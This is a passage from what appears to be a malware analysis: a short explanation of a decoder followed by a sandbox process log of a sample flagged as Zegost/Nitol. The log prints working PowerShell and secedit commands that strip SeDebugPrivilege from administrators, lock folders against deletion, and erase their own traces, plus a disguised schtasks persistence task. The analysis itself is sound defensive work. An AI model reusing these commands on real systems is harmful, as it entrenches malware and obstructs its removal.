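        print(label, json.dumps(triage(cmd), indent=2))
```

Two points worth keeping in mind when reading the output. A [Privilege Rights] entry in a security template is authoritative rather than additive: applying it leaves S-1-5-18 (LocalSystem, which already holds SeDebugPrivilege by default) as the only holder and removes the right from BUILTIN\Administrators, which normally has it. The [File Security] entry denies Everyone DELETE, FILE_DELETE_CHILD, READ_CONTROL and WRITE_DAC on C:\ProgramData\Program (targets 18 and 24) and C:\ProgramData\Data (target 19), inherited by everything beneath via OI/CI, so an administrator cannot simply delete or re-ACL those folders. Because the report's Remove-Item step wipes the .inf, .sdb and .log afterwards, the process command line is usually the only artifact, which is why the decoder works from the command line rather than from the file.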

                                                                                                                  Target ID:25
                                                                                                                  Start time:10:09:34
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6068e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:26
                                                                                                                  Start time:10:09:35
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd /c echo.>c:\inst.ini
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:27
                                                                                                                  Start time:10:09:35
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:28
                                                                                                                  Start time:10:09:35
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\ProgramData\Program\iusb3mon.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\ProgramData\program\iusb3mon.exe
                                                                                                                  Imagebase:0x1d0000
                                                                                                                  File size:2'766'808 bytes
                                                                                                                  MD5 hash:3BAED7BF765E1631DAF431D29173213C
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Zegost, Description: Yara detected Zegost, Source: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  Has exited:false

                                                                                                                  Target ID:29
                                                                                                                  Start time:10:09:36
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:30
                                                                                                                  Start time:10:09:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:31
                                                                                                                  Start time:10:09:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:32
                                                                                                                  Start time:10:09:37
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:33
                                                                                                                  Start time:10:09:38
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                  File size:55'320 bytes
                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:34
                                                                                                                  Start time:10:09:38
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:35
                                                                                                                  Start time:10:09:38
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:36
                                                                                                                  Start time:10:09:39
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:37
                                                                                                                  Start time:10:09:39
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:38
                                                                                                                  Start time:10:09:39
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:39
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:40
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:41
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:42
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
                                                                                                                  Imagebase:0xb30000
                                                                                                                  File size:433'152 bytes
                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:43
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:44
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:45
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:46
                                                                                                                  Start time:10:09:46
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:48
                                                                                                                  Start time:10:09:51
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:49
                                                                                                                  Start time:10:09:51
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:50
                                                                                                                  Start time:10:09:52
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\SecEdit.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
                                                                                                                  Imagebase:0x490000
                                                                                                                  File size:37'888 bytes
                                                                                                                  MD5 hash:BFC13856291E4B804D33BBAEFC8CB3B5
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:51
                                                                                                                  Start time:10:09:53
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x790000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:52
                                                                                                                  Start time:10:09:53
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:53
                                                                                                                  Start time:10:09:53
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
                                                                                                                  Imagebase:0x300000
                                                                                                                  File size:187'904 bytes
                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:54
                                                                                                                  Start time:10:09:53
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
                                                                                                                  Imagebase:0x7ff7be880000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:55
                                                                                                                  Start time:10:09:53
                                                                                                                  Start date:29/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Target ID:56
                                                                                                                  Start time:10:09:59
Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:10:09:59
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:10:09:59
Start date:29/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:10:09:59
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:10:10:00
Start date:29/12/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x300000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:10:10:05
Start date:29/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:10:10:05
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:10:10:05
Start date:29/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:10:10:06
Start date:29/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:65
Start time:10:10:06
Start date:29/12/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
Imagebase:0x300000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:66
Start time:10:10:11
Start date:29/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"_P18sPbB.exe\"));
Imagebase:0x7ff7be880000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

